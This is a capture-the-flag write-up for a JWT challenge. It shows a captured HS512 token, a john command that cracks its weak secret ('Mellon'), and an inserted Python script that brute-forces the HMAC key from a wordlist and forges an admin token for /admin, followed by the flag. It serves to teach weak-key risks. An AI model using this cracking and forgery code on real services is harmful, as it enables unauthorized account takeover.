Task

Ok this time the implementation is absolutely flawless! My JWTs are stronger than your pathetic hacking attempts.

Screenshot of the linked page, you are provided with guest credentials.

Solution

I logged in with the provided guest credentials, which produced a JWT. The page behind the login also links to an admin panel ("Login for Admins"). Since the challenge text insists that the implementation is absolutely flawless, I asked what could go wrong besides the implementation itself: the obvious candidate is key strength, i.e. a weak HMAC secret. So I took the generated JWT and inspected it on jwt.io. First the token itself:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJleHAiOjE2OTk2NTc1OTd9.MSkvOTMzczDnpy_rnL5E9xFOxRxzND9Ot4wbcf2JTqsOUrAc3rGXnM-lwxGV3dyJL5r9vS1GjWI5MvOhLHYqsQ

A JWT consists of three base64url-encoded segments separated by dots: a header, a payload and a signature. In our case the header was:

{
  "typ": "JWT",
  "alg": "HS512"
}

The following payload:

{
  "user": "guest",
  "exp": 1699657597
}

And the following signature (a raw MAC over the first two segments, so there is nothing to decode):

MSkvOTMzczDnpy_rnL5E9xFOxRxzND9Ot4wbcf2JTqsOUrAc3rGXnM-lwxGV3dyJL5r9vS1GjWI5MvOhLHYqsQ

Since I wanted to reach the admin panel and suspected a weak key, my goal was to mint a JWT for the user 'admin'. With HS512 the token is signed with a shared secret, so anyone who knows that secret can sign arbitrary payloads. The signature can be checked offline, so I brute-forced the secret against it, trying different wordlists I found online. At the actual event I solved it with a script I found online, but it is just as easy with john:

john jwt.txt --wordlist=shortKrak.txt --format=HMAC-SHA512

The secret was Mellon, which is included in the shortKrak wordlist. Creating an admin JWT was then trivial with jwt.io: same header (HS512), payload with user set to admin and an exp in the future, signed with Mellon. A GET request to /admin carrying that token returned the admin panel with the following text:
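The whole chain, decode the token, crack the HS512 secret offline against the signature, then forge an admin token with the recovered secret, as an added Python example (this is not the write-up's script or john; it uses only the standard library). The guest token is the one quoted above; the wordlist is a constructed stand-in for shortKrak.txt, and the forged payload's user/exp values are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac
import json
import time

# Guest token captured from the login, as quoted in the write-up.
GUEST_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9."
    "eyJ1c2VyIjoiZ3Vlc3QiLCJleHAiOjE2OTk2NTc1OTd9."
    "MSkvOTMzczDnpy_rnL5E9xFOxRxzND9Ot4wbcf2JTqsOUrAc3rGXnM-lwxGV3dyJL5r9vS1GjWI5MvOhLHYqsQ"
)


def b64url_decode(s: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def _raw_parts(token: str):
    """Return (signing_input, signature): the MAC covers 'header.payload' as ASCII."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return f"{header_b64}.{payload_b64}".encode("ascii"), b64url_decode(sig_b64)


def split_token(token: str):
    """Decode header and payload into dicts; the signature stays raw bytes."""
    header_b64, payload_b64, _ = token.split(".")
    _, sig = _raw_parts(token)
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig


def hs512(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha512).digest()


def verify(token: str, secret: str) -> bool:
    signing_input, sig = _raw_parts(token)
    return hmac.compare_digest(hs512(signing_input, secret), sig)


def crack_secret(token: str, candidates):
    """Offline dictionary attack: the first candidate that reproduces the signature is the key."""
    header, _, _ = split_token(token)
    if header.get("alg") != "HS512":
        raise ValueError(f"expected HS512, got {header.get('alg')!r}")
    signing_input, sig = _raw_parts(token)
    for candidate in candidates:
        if hmac.compare_digest(hs512(signing_input, candidate), sig):
            return candidate
    return None


def forge_token(secret: str, payload: dict) -> str:
    """Sign an arbitrary payload with the recovered secret, keeping the original header."""
    def enc(obj):
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))

    header = {"typ": "JWT", "alg": "HS512"}
    signing_input = f"{enc(header)}.{enc(payload)}".encode("ascii")
    return f"{signing_input.decode('ascii')}.{b64url_encode(hs512(signing_input, secret))}"


if __name__ == "__main__":
    header, payload, sig = split_token(GUEST_TOKEN)
    print("header :", header)
    print("payload:", payload)
    # Constructed stand-in for a real wordlist such as shortKrak.txt.
    wordlist = ["password", "secret", "admin", "Mellon", "jwt"]
    secret = crack_secret(GUEST_TOKEN, wordlist)
    print("secret :", secret)
    if secret:
        # The captured token's exp is long past; a forged token needs a fresh expiry.
        admin = forge_token(secret, {"user": "admin", "exp": int(time.time()) + 3600})
        print("admin token:", admin)
        print("verifies   :", verify(admin, secret))
```

Send the forged token to /admin the same way the site delivered the guest one (cookie or header, whichever the login response used). The cracking loop is exactly what john does per wordlist entry: one HMAC-SHA512 over the fixed signing input and a comparison against the captured MAC, which is why a dictionary secret falls in seconds.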

Realy????, you managed to break my super secret and opend the doors of Durin?Welcome in Moria!Here ist your flag: MRMCD2023{4b50lu73ly_p47h371c}.Well done!

So, that’s it:

MRMCD2023{4b50lu73ly_p47h371c}

Solved by petrosyan